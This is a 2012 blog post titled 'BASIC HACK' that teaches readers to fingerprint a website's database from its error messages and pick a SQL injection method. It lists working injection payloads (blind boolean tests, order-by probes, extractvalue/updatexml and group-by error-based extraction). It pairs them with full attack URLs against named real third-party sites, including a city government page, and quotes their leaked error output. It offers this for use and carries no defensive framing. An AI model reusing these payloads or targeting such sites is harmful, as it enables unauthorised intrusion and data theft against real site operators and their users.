BASIC HACK

Sunday 9 September 2012

How to know DB and method of injection

How to know SQL_DB and method of injection

MySQL server

| from error


PHP Code:
You have an error in your SQL syntaxcheck the manual that corresponds to your MySQL server version for the right syntax 

Using the query after link

/*!50067 AND 47=47 */

page true (loading good)

PHP Code:
https://www.manase.org/maharashtra.php?mid=86/*!50067%20AND%2047=47%20*/ 
PHP Code:
http://www.peterduff.com/main.php?ID=1/*!50067%20AND%2047=47%20*/ 

MS-Access

| from error

PHP Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access DriverSyntax error in string in query expression 'id=66''.

/product.asp, line 106 

Oracle

| from error

PHP Code:
Warningoci_parse() [function.oci-parse]: ORA-01756une chaîne entre apostrophes ne se termine pas correctement in D:\wamp\www_mediaction\site\cfpb_reseau_france.php on line 14 

Using the query after link

String Concatenation

+SELECT ‘A’ || ‘B’ FROM dual; — returns AB

page true (loading good)

PHP Code:
http://www.cfpb.fr/cfpb_reseau_france.php?id=1+SELECT%20%E2%80%98A%E2%80%99%20||%20%E2%80%98B%E2%80 ​%99%20FROM%20dual;%20%E2%80%94%20returns%20AB 

and can used |

+MINUS SELECT NULL, NULL, NULL FROM DUAL

page true (loading good)

PHP Code:
http://www.cfpb.fr/cfpb_reseau_france.php?id=1+MINUS%20SELECT%20NULL,%20NULL,%20NULL%20FROM%20DUAL 

PostgreSQL

| from error

PHP Code:
Warningpg_query(): Query failedERRORunterminated quoted string at or near 

String Concatenation

+AND 'str1str2'='str1'||'str2'

page true (loading good)

PHP Code:
http://www.pittsburghpa.gov/mayor/article.htm?id=851+AND%20%27str1str2%27=%27str1%27||%27str2%27 

Sybase

| from error

PHP Code:
Warningsybase_query() [function.sybase-query]: SybaseServer messageUnclosed quote before the character string ' '. (severity 15procedure N/Ain /www/okfarmbureau/LFWSmartyPage.php on line 60 

Firebirdsql

| from error

PHP Code:
Warningibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 as approximate floating-point values in SQL dialect 1but as 64-bit in \\deceasrv16\hca$\noticias\exibir_noticias.php on line 15 

To Know method of injection | used syntax

++

if order by Not working using String base

id=-1' order by 100 -- -

-- - ,, --++- ,, -++--,,

++

Blind-sql

+And+1=1 | True
+And+1=2 | Error
+And+(select+1)=1 | True

++

PostgreSQL

+AND+1::int=1 | True
+AND+1::int=2 | Error

++

Oracle

+UNION+SELECT+NULL+from+dual | True
+MINUS SELECT NULL, NULL, NULL FROM DUAL | True

++

xpath injection

+and extractvalue(rand(),concat(0x0a,version()))--

+and+extractvalue(rand(),concat(0x7e,version()))--

+and+updatexml(0x7e,concat(0x7e,(version())),0)--
++

Error Based

+or+1+group+by+concat_ws(0x3a,version(),floor(rand(0)*2))+having+min(0)+or+1--


thank you for reading...

1 comment: